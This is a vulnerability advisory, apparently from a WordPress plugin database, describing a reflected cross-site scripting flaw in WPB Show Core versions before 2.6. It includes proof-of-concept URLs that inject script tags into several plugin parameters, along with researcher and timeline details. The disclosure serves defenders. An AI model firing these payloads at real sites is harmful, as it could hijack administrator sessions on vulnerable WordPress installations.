WordPress Plugin Vulnerabilities
WPB Show Core < 2.6 - Reflected XSS
Description
The plugin does not sanitise and escape some parameters before outputting them back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin
Proof of Concept
https://example.com/wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php?podcastName=%3Cscript%3Ealert(1337)%3C/script%3E https://example.com/wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php?podcastSlug=%22%3E%3Cscript%3Ealert(1337)%3C/script%3E// https://www.example.com/wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php?title=1-18-24%3Cscript%3Ealert(1337)%3C/script%3E&podcastName=Lightning+Thursdays&podCastImage=https%3A%2F%2Fdehayf5mhw1h7.cloudfront.net%2Fwp-content%2Fuploads%2Fsites%2F874%2F2018%2F03%2F26232451%2Fhendersonville-lightning.png&podcastSlug=lightning-thursdays&siteurl=https%3A%2F%2Fwww.example.com&fileList%5B0%5D%5Bid%5D=49824&fileList%5B0%5D%5Bmp3%5D=https%3A%2F%2Fdehayf5mhw1h7.cloudfront.net%2Fwp-content%2Fuploads%2Fsites%2F874%2F2024%2F01%2F18105309%2FLightning-TODAY-1-18-24.mp3&fileList%5B0%5D%5Btitle%5D=1-18-241-2%3Cscript%3Ealert(1337)%3C/script%3E&fileList%5B0%5D%5Bactual_mp3%5D=&blogid=874&rss_feed_link=https%3A%2F%2Fwww.example.com%2Fpodcast%2Flightning-thursdays%2Ffeed%2F%3Fpost_type%3Depisode&podImg_URL=https%3A%2F%2Fdehayf5mhw1h7.cloudfront.net%2Fwp-content%2Fuploads%2Fsites%2F874%2F2018%2F03%2F26232451%2Fhendersonville-lightning.png&podCastId=78&episodeId=49824&audioPlayerOption=advance&gmf=-5&ckd=www.example.com&embedFlag=podcast
Affects Plugins
References
CVE
Classification
Type
XSS
OWASP top 10
CWE
Miscellaneous
Original Researcher
Aly Khaled Aly Abd Al-aal
Submitter
Aly Khaled Aly Abd Al-aal
Submitter website
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2024-03-18 (about 1 months ago)
Added
2024-03-18 (about 1 months ago)
Last Updated
2024-03-18 (about 1 months ago)